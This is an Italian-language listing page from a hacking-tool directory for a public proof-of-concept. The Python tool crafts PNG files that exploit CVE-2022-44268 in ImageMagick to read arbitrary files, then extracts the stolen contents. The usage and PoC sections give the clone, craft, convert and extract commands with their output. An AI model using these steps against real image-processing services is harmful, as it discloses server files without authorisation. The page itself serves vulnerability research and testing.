Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2022-44268 — Generatore ed estrattore di payload per CVE-2022-44268 scritto in Python. | Kitploit
Strumenti/GitHubGitHub/agathanon/cve-2022-44268
Generazione di PayloadAnalisi delle VulnerabilitàExploitEsfiltrazione DatiRaccolta Informazioni
GitHubagathanon/cve-2022-44268

cve-2022-44268

Generatore ed estrattore di payload per CVE-2022-44268 scritto in Python.

Vedi Repository
413 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-44268

Credito ai ricercatori che lo hanno scoperto:

  • Bryan Gonzalez e il team Ocelot

Crea un PNG dannoso per sfruttare ImageMagick 7.1.0-40:

  • CVE-2022-44267: Negazione del Servizio
  • CVE-2022-44268: Divulgazione di Informazioni

Disclaimer: L'autore di questo progetto non è responsabile per eventuali danni causati dai materiali di questo progetto.

Requisiti

  • Python3
  • PIL (pip install Pillow)

Utilizzo

Creazione di un PNG con craft.py:

root@kitploit:~
git clone https://github.com/agathanon/cve-2022-44268
cd cve-2022-44268
python3 craft.py original.png lol.png /path/to/file

Estrazione dei dati con extract.py:

root@kitploit:~
python3 extract.py exfil.png

PoC

root@kitploit:~
anon@computer:~/code/cve-2022-44268$ python3 craft.py original.png readflag.png $PWD/flag.txt 
anon@computer:~/code/cve-2022-44268$ convert readflag.png -resize 100x100 exfil.png
anon@computer:~/code/cve-2022-44268$ python3 extract.py exfil.png
AAAABBBBCCCC

anon@computer:~/code/cve-2022-44268$ 
Scarica lo strumento